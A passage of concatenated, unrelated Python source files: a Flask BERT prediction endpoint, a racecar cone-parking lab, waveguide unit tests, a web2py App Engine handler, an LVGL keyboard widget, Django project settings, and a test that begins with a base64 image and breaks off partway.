if self.verbose:
print("评估数据集已加载")
res = self.do_predict(self.model, eval_dataset)
if self.verbose:
print(f"预测的结果是: {res}, {[self.label_list[id] for id in res]}")
#把id变成标签
result = [self.label_list[r] for r in res]
return result
def do_predict(self, model, eval_dataset):
# 任务名字
results = []
if self.verbose:
print("***** 开始预测 *****")
print(" 样本数 = %d", len(eval_dataset))
print(" Batch size = %d", self.predict_batch_size)
# 评估样本
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.predict_batch_size)
model.eval()
model.to(self.device)
# 起始时间
start_time = time.time()
# 存储预测值
pred_logits = []
for batch in tqdm(eval_dataloader, desc="评估中", disable=True):
input_ids, input_mask, segment_ids = batch
input_ids = input_ids.to(self.device)
input_mask = input_mask.to(self.device)
segment_ids = segment_ids.to(self.device)
with torch.no_grad():
logits = model(input_ids, input_mask, segment_ids)
cpu_logits = logits.detach().cpu()
for i in range(len(cpu_logits)):
pred_logits.append(cpu_logits[i].numpy())
pred_logits = np.array(pred_logits)
# 找到最大的概率label
preds = np.argmax(pred_logits, axis=1)
if self.verbose:
print(f"preds: {preds}")
results.extend(preds.tolist())
cost_time = time.time() - start_time
if self.verbose:
print(
f"--- 评估{len(eval_dataset)}条数据的总耗时是 {cost_time} seconds, 每条耗时 {cost_time / len(eval_dataset)} seconds ---")
return results
@app.route("/api", methods=['POST'])
def api():
"""
Args:
test_data: 需要预测的数据,是一个文字列表, [(content,aspect),...,]
Returns:
"""
jsonres = request.get_json()
test_data = jsonres.get('data', None)
model = TorchAsBertModel()
results = model.predict_batch_without_turncate(test_data)
return jsonify(results)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True, threaded=True)
|
py | 1a40bf2f730b3869f884e394f878e6cc92957491 |
def do():
import trimesh
return trimesh.creation.icosphere().convex_hull
if __name__ == '__main__':
do()
|
py | 1a40bfdaaf7152ef0f602442a668dc8eaf63379b | """
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
Lab 2B - Color Image Cone Parking
"""
########################################################################################
# Imports
########################################################################################
import sys
import cv2 as cv
import numpy as np
from enum import IntEnum
sys.path.insert(1, "../../library")
import racecar_core
import racecar_utils as rc_utils
########################################################################################
# Global variables
########################################################################################
rc = racecar_core.create_racecar()
# >> Constants
# The smallest contour we will recognize as a valid contour
MIN_CONTOUR_AREA = 30
# The HSV range for the color orange, stored as (hsv_min, hsv_max)
ORANGE = ((10, 100, 100), (20, 255, 255))
# >> Variables
speed = 0.0 # The current speed of the car
angle = 0.0 # The current angle of the car's wheels
contour_center = None # The (pixel row, pixel column) of contour
contour_area = 0 # The area of contour
########################################################################################
# Functions
########################################################################################
class State(IntEnum):
search = 0
obstacle = 1
approach = 2
stop = 3
curState = State.search
def update_contour():
"""
Finds contours in the current color image and uses them to update contour_center
and contour_area
"""
global contour_center
global contour_area
image = rc.camera.get_color_image()
if image is None:
contour_center = None
contour_area = 0
else:
# Find all of the orange contours
contours = rc_utils.find_contours(image, ORANGE[0], ORANGE[1])
# Select the largest contour
contour = rc_utils.get_largest_contour(contours, MIN_CONTOUR_AREA)
if contour is not None:
# Calculate contour information
contour_center = rc_utils.get_contour_center(contour)
contour_area = rc_utils.get_contour_area(contour)
# Draw contour onto the image
rc_utils.draw_contour(image, contour)
rc_utils.draw_circle(image, contour_center)
else:
contour_center = None
contour_area = 0
# Display the image to the screen
rc.display.show_color_image(image)
def start():
"""
This function is run once every time the start button is pressed
"""
global speed
global angle
# Initialize variables
speed = 0
angle = 0
# Set initial driving speed and angle
rc.drive.set_speed_angle(speed, angle)
# Set update_slow to refresh every half second
rc.set_update_slow_time(0.5)
# Print start message
print(">> Lab 2B - Color Image Cone Parking")
def update():
"""
After start() is run, this function is run every frame until the back button
is pressed
"""
global speed
global angle
global curState
# Search for contours in the current color image
update_contour()
imgX = rc.camera.get_width()
if contour_center is not None:
angle = rc_utils.remap_range(contour_center[1],0,imgX,-1,1)
# TODO: Park the car 30 cm away from the closest orange cone
if curState == State.search:
rc.drive.set_speed_angle(0.5, 1)
if contour_center is not None:
curState = State.approach
# elif curState == State.obstacle:
elif curState == State.approach:
# rc.drive.set_speed_angle(0.5, angle)
if contour_area < 3110:
rc.drive.set_speed_angle(0.35,angle)
elif contour_area >= 3110 and contour_area < 17670 :
rc.drive.set_speed_angle(0.2,angle)
elif contour_area >= 17670 and contour_area < 25000:
rc.drive.set_speed_angle(0.01,angle)
elif contour_area > 26450:
curState = State.stop
print("stop")
elif curState == State.stop:
rc.drive.set_speed_angle(0,0)
# 101m = 3110 pixels
# 30m = 27353 pixels
# 40m = 17670 pixels
# Print the current speed and angle when the A button is held down
if rc.controller.is_down(rc.controller.Button.A):
print("Speed:", speed, "Angle:", angle)
# Print the center and area of the largest contour when B is held down
if rc.controller.is_down(rc.controller.Button.B):
if contour_center is None:
print("No contour found")
else:
print("Center:", contour_center, "Area:", contour_area)
def update_slow():
"""
After start() is run, this function is run at a constant rate that is slower
than update(). By default, update_slow() is run once per second
"""
# Print a line of ascii text denoting the contour area and x position
if rc.camera.get_color_image() is None:
# If no image is found, print all X's and don't display an image
print("X" * 10 + " (No image) " + "X" * 10)
else:
# If an image is found but no contour is found, print all dashes
if contour_center is None:
print("-" * 32 + " : area = " + str(contour_area))
# Otherwise, print a line of dashes with a | indicating the contour x-position
else:
s = ["-"] * 32
s[int(contour_center[1] / 20)] = "|"
print("".join(s) + " : area = " + str(contour_area))
########################################################################################
# DO NOT MODIFY: Register start and update and begin execution
########################################################################################
if __name__ == "__main__":
rc.set_start_update(start, update, update_slow)
rc.go() |
py | 1a40c161e4d64e9075b921103bce50e2f4540516 | import unittest
import numpy as np
import numpy.testing as npt
import ray
import pymwm
from pymwm.cylinder.samples import Samples, SamplesForRay
class TestCylinderSamples(unittest.TestCase):
def setUp(self):
betas = []
convs = []
betas.append(
[
1.32930242e-03 + 15.97093724j,
-4.12022699e-04 + 36.77569389j,
-2.96423554e-03 + 57.67676409j,
4.25706586e-01 + 22.16438948j,
1.16961605e00 + 39.91871066j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
3.93618487e-04 + 25.50725697j,
-1.69749464e-03 + 46.75220214j,
-3.60166883e-03 + 67.81044568j,
1.88412925e-01 + 10.63429198j,
6.65409650e-01 + 30.69581722j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-3.14039183e-04 + 34.21067616j,
-3.02497952e-03 + 56.09987523j,
-3.99382568e-03 + 77.45436569j,
3.16581667e-01 + 17.70646046j,
9.90337935e-01 + 38.34855698j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-1.22828011e-03 + 42.51416161j,
-3.77291544e-03 + 65.06037821j,
-4.27041215e-03 + 86.7578285j,
4.45859022e-01 + 24.35935701j,
1.56012941e00 + 45.43872731j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-0.00274348 + 50.57304098j,
-0.00424744 + 73.75302452j,
-0.00448273 + 95.80756518j,
0.58332927 + 30.80613956j,
2.57935560 + 52.37067052j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-0.00422390 + 58.46301045j,
-0.00458645 + 82.24672285j,
-0.00465523 + 104.65914944j,
0.73689393 + 37.1144517j,
3.79669182 + 59.48095715j,
]
)
convs.append([True, True, True, True, True])
self.betas = np.array(betas)
self.convs = np.array(convs)
self.params = {
"core": {"shape": "cylinder", "size": 0.15, "fill": {"RI": 1.0}},
"clad": {"book": "Au", "page": "Stewart-DLF", "bound_check": False},
"modes": {
"wl_max": 5.0,
"wl_min": 1.0,
"wl_imag": 50.0,
"dw": 1.0 / 64,
"num_n": 6,
"num_m": 2,
},
}
def test_attributes(self):
params: dict = self.params.copy()
size: float = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
p = params["modes"]
ind_w_min = int(np.floor(2 * np.pi / p["wl_max"] / p["dw"]))
ind_w_max = int(np.ceil(2 * np.pi / p["wl_min"] / p["dw"]))
ind_w_imag = int(np.ceil(2 * np.pi / p["wl_imag"] / p["dw"]))
ws = np.arange(ind_w_min, ind_w_max + 1) * p["dw"]
wis = -np.arange(ind_w_imag + 1) * p["dw"]
npt.assert_equal(wg.ws, ws)
npt.assert_equal(wg.wis, wis)
def test_beta2_pec(self):
params: dict = self.params.copy()
size: float = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
w = 2 * np.pi / 5.0
pec0 = (
np.array(
[
7.9914227540830467j,
18.389529559512987j,
28.838915878616223j,
12.756889235180587j,
23.376846509563137j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 0), pec0 ** 2)
pec1 = (
np.array(
[
12.756889235180589j,
23.376846509563137j,
33.90573916009118j,
6.1050317506026381j,
17.760365196297929j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 1), pec1 ** 2)
pec2 = (
np.array(
[
17.107206360452462j,
28.050444310850633j,
38.72770732091869j,
10.161382581946896j,
22.344945200686148j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 2), pec2 ** 2)
pec3 = (
np.array(
[
21.257922769420034j,
32.530676457118169j,
43.37945228513604j,
13.989860591754667j,
26.710066174072818j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 3), pec3 ** 2)
pec4 = (
np.array(
[
25.286669814449052j,
36.877012636462631j,
47.90433520177347j,
17.71403733166369j,
30.934940730583346j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 4), pec4 ** 2)
pec5 = (
np.array(
[
29.231527454256089j,
41.123881000095977j,
52.330141681593268j,
21.376155694373626j,
35.060573334299526j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 5), pec5 ** 2)
def test_beta2_w_min(self):
params: dict = {
"core": {"shape": "cylinder", "size": 0.15, "fill": {"RI": 1.0}},
"clad": {"book": "Au", "page": "Stewart-DLF", "bound_check": False},
"modes": {"num_n": 6, "num_m": 2},
}
size = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
self.assertEqual(wg.ws[0], 1.25)
num_n = params["modes"]["num_n"]
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(params["modes"])
pool = ray.util.ActorPool(
SamplesForRay.remote(size, fill, clad, p_modes_id) for _ in range(num_n)
)
vals = list(
pool.map(lambda a, arg: a.beta2_w_min.remote(arg), range(num_n))
)
finally:
ray.shutdown()
for n in range(6):
print(n)
h2s, success = vals[n]
print(success)
npt.assert_allclose(h2s, self.betas[n] * self.betas[n], rtol=1e-6)
def test_db(self):
params: dict = self.params.copy()
size = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
try:
betas, convs = wg.database.load()
except IndexError:
num_n = params["modes"]["num_n"]
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(params["modes"])
pool = ray.util.ActorPool(
SamplesForRay.remote(size, fill, clad, p_modes_id)
for _ in range(num_n)
)
xs_success_list = list(
pool.map(lambda a, arg: a.task.remote(arg), range(num_n))
)
finally:
ray.shutdown()
betas, convs = wg.betas_convs(xs_success_list)
wg.database.save(betas, convs)
for n in range(6):
print(n)
npt.assert_allclose(
[
betas[("M", n, 1)][0, 0],
betas[("M", n, 2)][0, 0],
betas[("E", n, 1)][0, 0],
betas[("E", n, 2)][0, 0],
],
[
self.betas[n][0],
self.betas[n][1],
self.betas[n][3],
self.betas[n][4],
],
)
self.assertEqual(
[
convs[("M", n, 1)][0, 0],
convs[("M", n, 2)][0, 0],
convs[("E", n, 1)][0, 0],
convs[("E", n, 2)][0, 0],
],
[
self.convs[n][0],
self.convs[n][1],
self.convs[n][3],
self.convs[n][4],
],
)
def test_interpolation(self):
params: dict = self.params.copy()
size = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
try:
betas, convs = wg.database.load()
except IndexError:
num_n = params["modes"]["num_n"]
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(params["modes"])
pool = ray.util.ActorPool(
SamplesForRay.remote(size, fill, clad, p_modes_id)
for _ in range(num_n)
)
xs_success_list = list(
pool.map(lambda a, arg: a.task.remote(arg), range(num_n))
)
finally:
ray.shutdown()
betas, convs = wg.betas_convs(xs_success_list)
wg.database.save(betas, convs)
vs = {}
for key in betas.keys():
h2s = betas[key] ** 2
ws = wg.ws
vs[key] = np.array([wg.v(h2, w, wg.clad(w)) for h2, w in zip(h2s, ws)])
beta_funcs = wg.database.interpolation(
betas, convs, vs, bounds={"wl_max": 3.0, "wl_min": 1.0, "wl_imag": 100.0}
)
self.assertAlmostEqual(
beta_funcs[(("M", 0, 1), "real")](2 * np.pi, 0.0)[0, 0],
0.011030829731291485,
)
self.assertAlmostEqual(
beta_funcs[(("M", 0, 1), "imag")](2 * np.pi, 0.0)[0, 0], 14.374412149329419
)
self.assertAlmostEqual(
beta_funcs[(("M", 1, 1), "real")](2 * np.pi, 0.0)[0, 0],
0.0024442176360349316,
)
self.assertAlmostEqual(
beta_funcs[(("M", 1, 1), "imag")](2 * np.pi, 0.0)[0, 0], 24.573875828863905
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.07516250767481286
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 1), "imag")](2 * np.pi, 0.0)[0, 0], 8.2795729054555345
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 2), "real")](2 * np.pi, 0.0)[0, 0], 0.1884476108781034
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 2), "imag")](2 * np.pi, 0.0)[0, 0], 29.74494425189081
)
self.assertAlmostEqual(
beta_funcs[(("E", 2, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.10224849620607172
)
self.assertAlmostEqual(
beta_funcs[(("E", 2, 1), "imag")](2 * np.pi, 0.0)[0, 0], 16.184787946722981
)
self.assertAlmostEqual(
beta_funcs[(("E", 3, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.1353140706821849
)
self.assertAlmostEqual(
beta_funcs[(("E", 3, 1), "imag")](2 * np.pi, 0.0)[0, 0], 23.102611360449739
)
self.assertAlmostEqual(
beta_funcs[(("E", 4, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.1720347941605904
)
self.assertAlmostEqual(
beta_funcs[(("E", 4, 1), "imag")](2 * np.pi, 0.0)[0, 0], 29.661836787913028
)
def test_eig_mat(self):
size = self.params["core"]["size"]
fill = self.params["core"]["fill"]
clad = self.params["clad"]
wg = Samples(size, fill, clad, self.params["modes"])
h2 = -35513.94604091 - 6.53379717e5j
w = 2 * np.pi / 100.0
e1 = wg.fill(w)
e2 = wg.clad(w) * 100
eps = 1e-4
a, b = wg.eig_mat(h2, w, "M", 0, e1, e2)
a1, b1 = wg.eig_mat(h2 + eps, w, "M", 0, e1, e2)
a2, b2 = wg.eig_mat(h2 - eps, w, "M", 0, e1, e2)
da_dh2 = (a1 - a2) / (2 * eps)
npt.assert_almost_equal(b, da_dh2)
a, b = wg.eig_mat(h2, w, "E", 0, e1, e2)
a1, b1 = wg.eig_mat(h2 + eps, w, "E", 0, e1, e2)
a2, b2 = wg.eig_mat(h2 - eps, w, "E", 0, e1, e2)
da_dh2 = (a1 - a2) / (2 * eps)
npt.assert_almost_equal(b, da_dh2)
a, b = wg.eig_mat(h2, w, "M", 2, e1, e2)
a1, b1 = wg.eig_mat(h2 + eps, w, "M", 2, e1, e2)
a2, b2 = wg.eig_mat(h2 - eps, w, "M", 2, e1, e2)
da_dh2 = (a1 - a2) / (2 * eps)
npt.assert_almost_equal(b, da_dh2)
if __name__ == "__main__":
unittest.main()
|
py | 1a40c1ffe2f0635dabb4a1fed683643ecf57c281 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <[email protected]>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
"""
##############################################################################
# Configuration parameters for Google App Engine
##############################################################################
KEEP_CACHED = False # request a dummy url every 10secs to force caching app
LOG_STATS = False # web2py level log statistics
APPSTATS = True # GAE level usage statistics and profiling
DEBUG = False # debug mode
AUTO_RETRY = True # force gae to retry commit on failure
#
# Read more about APPSTATS here
# http://googleappengine.blogspot.com/2010/03/easy-performance-profiling-with.html
# can be accessed from:
# http://localhost:8080/_ah/stats
##############################################################################
# All tricks in this file developed by Robin Bhattacharyya
##############################################################################
import time
import os
import sys
import logging
import cPickle
import pickle
import wsgiref.handlers
import datetime
path = os.path.dirname(os.path.abspath(__file__))
sys.path = [path]+[p for p in sys.path if not p==path]
sys.modules['cPickle'] = sys.modules['pickle']
from gluon.settings import global_settings
from google.appengine.api.labs import taskqueue
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
global_settings.web2py_runtime_gae = True
if os.environ.get('SERVER_SOFTWARE', '').startswith('Devel'):
(global_settings.web2py_runtime, DEBUG) = \
('gae:development', True)
else:
(global_settings.web2py_runtime, DEBUG) = \
('gae:production', False)
import gluon.main
def log_stats(fun):
"""Function that will act as a decorator to make logging"""
def newfun(env, res):
"""Log the execution time of the passed function"""
timer = lambda t: (t.time(), t.clock())
(t0, c0) = timer(time)
executed_function = fun(env, res)
(t1, c1) = timer(time)
log_info = """**** Request: %.2fms/%.2fms (real time/cpu time)"""
log_info = log_info % ((t1 - t0) * 1000, (c1 - c0) * 1000)
logging.info(log_info)
return executed_function
return newfun
logging.basicConfig(level=logging.INFO)
def wsgiapp(env, res):
"""Return the wsgiapp"""
if env['PATH_INFO'] == '/_ah/queue/default':
if KEEP_CACHED:
delta = datetime.timedelta(seconds=10)
taskqueue.add(eta=datetime.datetime.now() + delta)
res('200 OK',[('Content-Type','text/plain')])
return ['']
env['PATH_INFO'] = env['PATH_INFO'].encode('utf8')
return gluon.main.wsgibase(env, res)
if LOG_STATS or DEBUG:
wsgiapp = log_stats(wsgiapp)
if AUTO_RETRY:
from gluon.contrib.gae_retry import autoretry_datastore_timeouts
autoretry_datastore_timeouts()
def main():
"""Run the wsgi app"""
if APPSTATS:
run_wsgi_app(wsgiapp)
else:
wsgiref.handlers.CGIHandler().run(wsgiapp)
if __name__ == '__main__':
main()
|
py | 1a40c210600638c6abd58d78e4688456955d6a83 | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis <[email protected]>
# parasim
# (c) 1998-2021 all rights reserved
#
# the action protocol
from .Action import Action as action
# and the base command panel
from .Command import Command as command
# factories for the local objects
from .Ampcor import Ampcor as ampcor
# end of file
|
py | 1a40c23164d3e706b5ef2d6ab3265f691d10fe5d | """A keyboard with a hint when you press it"""
import lvgl as lv
from ..decorators import feed_touch
from .theme import styles
class HintKeyboard(lv.btnm):
def __init__(self, scr, *args, **kwargs):
super().__init__(scr, *args, **kwargs)
self.hint = lv.btn(scr)
self.hint.set_size(50, 60)
self.hint_lbl = lv.label(self.hint)
self.hint_lbl.set_text(" ")
self.hint_lbl.set_style(0, styles["title"])
self.hint_lbl.set_size(50, 60)
self.hint.set_hidden(True)
self.callback = None
super().set_event_cb(self.cb)
def set_event_cb(self, callback):
self.callback = callback
def get_event_cb(self):
return self.callback
def cb(self, obj, event):
if event == lv.EVENT.PRESSING:
feed_touch()
c = obj.get_active_btn_text()
if c is not None and len(c) <= 2:
self.hint.set_hidden(False)
self.hint_lbl.set_text(c)
point = lv.point_t()
indev = lv.indev_get_act()
lv.indev_get_point(indev, point)
self.hint.set_pos(point.x-25, point.y-130)
elif event == lv.EVENT.RELEASED:
self.hint.set_hidden(True)
if self.callback is not None:
self.callback(obj, event)
|
py | 1a40c275b6b1ad5cab4c851a843a99f93b4941de | """
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tv!n_c7#%+_gqfn3xs=6&jj!$bb^4i+k8y5u&rud@=hvq*_#5n'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'profiles_api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'profiles_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'profiles_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'profiles_api.UserProfile'
|
py | 1a40c2ab010c2309f8bca1b23c062d69ae086be2 | import base64
import json
from aspen.testing.client import FileUpload
from gratipay.testing import Harness, T
IMAGE = base64.b64decode(b"""\
/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0a
HBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAD9AeYDASIA
AhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQA
AAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3
ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWm
p6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEA
AwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSEx
BhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElK
U1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3
uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/pcH
GccUu47NvGM5puaAHvG6BWdGUONykjGR6imVP+8mgy82REAqqzc454ApkTrHIrMgcA5KknB9uKAI
6X61NPNHNdvKsCxxs5YRKThRnoO9NnaJ5maGMxxk/Khbdj8e9AEVLtO3dg49cU+GMSyqjSLGCfvP
0FStcTRW7WazlrcSFtqn5Semf0oArUVJKYSE8oODtG7cc898e1R0AFFFOVipJGORjkUANopSQcdB
UtwkMbgQTGVcAliu3n0oAhHHSlJJOScmkooAKKKKACiiigB6Ru+7aCdoyfYUypY7iWKORI3KrINr
gdxTBg5LHntx1oAbToygkBkUsmeQDg1Lc3AuZd4hii4A2xLgfWoKAFYqWO0EDPANJUrw7bdJfMjO
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
